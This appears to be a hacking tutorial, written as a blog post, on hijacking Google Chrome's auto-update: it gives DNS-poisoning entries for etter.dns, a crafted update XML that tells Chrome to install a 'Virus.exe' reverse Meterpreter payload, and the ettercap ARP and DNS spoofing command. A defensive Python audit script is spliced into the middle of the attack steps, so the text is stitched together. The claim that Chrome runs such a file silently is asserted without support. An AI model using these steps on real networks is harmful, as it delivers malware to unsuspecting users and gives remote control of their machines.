Well, I have to hand it to those geniuses… This one is quite interesting. Here, we are going to take a look at a Man in the Middle where DNS poisoning is used to masquerade as the Google Chrome update server. Google Chrome looks for an update EXE, and the hacker feeds it a malevolent EXE instead. Apparently Google Chrome swallows it whole and just runs the darn thing.
Prerequisites:
- Apache and ettercap
- OR Kali Linux
Givens:
IP 111.111.111.111 is the Attacker
IP 222.222.222.22X are the Victims
Let’s begin:
Google Chrome has a great little auto-update feature that runs every 15 minutes or so and downloads and runs an update EXE. By tricking the victim’s computer into thinking the attack computer is the update server, you can make anyone running Chrome on the network run the malevolent EXE silently.
Let’s start off with the basic background knowledge. The hacker will need to DNS-poison the network and tell all computers that the attacker is the update server.
(Please note, commands are done as if running Kali)
Shell:
find / -name etter.dns
Copy the path to etter.dns (highlight, then ctrl+shift+C) and then run
nano /path/to/etter.dns
You will be presented with the editable DNS file.
You want to add entries of:
tools.google.com A 111.111.111.111
*tools.google.com A 111.111.111.111
www.tools.google.com A 111.111.111.111
Press ctrl+X and then save.
Now, let’s set up our server to serve our Virus.exe:
Direct all requests to your server to the following XML document we will make.
(For more info on the XML format, see Google’s Omaha Server Protocol v3)
First we need to gather our info.
Are we hitting 32-bit Chrome, or 64-bit?
Most people are on 64-bit these days, so for this example I’ll be doing 64-bit:
appid="4DC8B4CA-1DBA-483E-B5FA-D3C12E15B62D"
(you can easily grab the ID for 32-bit with Wireshark)
Now, we have our Virus.exe (you can easily make a reverse Meterpreter EXE with Metasploit).
Take the SHA-1 hash of Virus.exe, base64-encoded.
EX: VXriGUVI0TNqfLlU02vBel4Q3Zo=
Then we craft our XML to serve:
<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
  <daystart elapsed_seconds="56508"/>
  <app appid="{4DC8B4CA-1DBA-483E-B5FA-D3C12E15B62D}" status="ok">
    <updatecheck status="ok">
      <urls>
        <url codebase="111.111.111.111"/>
      </urls>
      <!-- opening manifest tag was missing from the original; packages and actions sit inside it -->
      <manifest>
        <packages>
          <package hash="VXriGUVI0TNqfLlU02vBel4Q3Zo=" name="Virus.exe" required="true" size="2983"/>
        </packages>
        <actions>
          <action arguments="" event="install" run="Virus.exe"/>
        </actions>
      </manifest>
    </updatecheck>
    <ping status="ok"/>
  </app>
</response>
Host the XML in the root of your server along with Virus.exe
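From the defender’s side, the same response format can be audited: the `hash` attribute is just base64(SHA-1) of the package bytes, so a client or network sensor can recompute it against what was actually fetched and flag a codebase that is a bare IP or not HTTPS. The script below is an added example, not part of the original post or of Google’s updater; the sample response is constructed from the values above, and `audit_response`/`omaha_hash` are names chosen here.

```python
import base64
import hashlib
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample response in the Omaha v3 shape shown in the post.
SAMPLE_RESPONSE = """<response protocol="3.0" server="prod">
  <app appid="{4DC8B4CA-1DBA-483E-B5FA-D3C12E15B62D}" status="ok">
    <updatecheck status="ok">
      <urls><url codebase="111.111.111.111"/></urls>
      <manifest>
        <packages>
          <package hash="VXriGUVI0TNqfLlU02vBel4Q3Zo=" name="Virus.exe" required="true" size="2983"/>
        </packages>
      </manifest>
    </updatecheck>
  </app>
</response>"""


def omaha_hash(data: bytes) -> str:
    """Base64-encoded SHA-1 digest, the format of the package 'hash' attribute."""
    return base64.b64encode(hashlib.sha1(data).digest()).decode("ascii")


def is_bare_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def audit_response(xml_text: str, downloaded: dict) -> list:
    """Return findings for an update response; `downloaded` maps package name -> fetched bytes."""
    findings = []
    root = ET.fromstring(xml_text)
    for url in root.iter("url"):
        codebase = url.get("codebase", "")
        # urlparse needs a '//' prefix to treat a scheme-less value as a host
        parsed = urlparse(codebase if "://" in codebase else "//" + codebase)
        if parsed.scheme != "https":
            findings.append(f"codebase not https: {codebase!r}")
        if is_bare_ip(parsed.hostname or ""):
            findings.append(f"codebase is a bare IP: {codebase!r}")
    for pkg in root.iter("package"):
        name, expected = pkg.get("name"), pkg.get("hash")
        data = downloaded.get(name)
        if data is None:
            findings.append(f"package {name!r} listed but not fetched")
        elif omaha_hash(data) != expected:
            findings.append(f"hash mismatch for {name!r}")
        elif str(len(data)) != pkg.get("size"):
            findings.append(f"size mismatch for {name!r}")
    return findings
```

A hash that matches only proves the attacker served consistent values, so the codebase and transport checks (and, in a real client, a signature check on the binary) are what actually catch this spoof.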
Then open ettercap and
ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
And now any time Google Chrome goes to update, it will grab your virus instead of the actual update.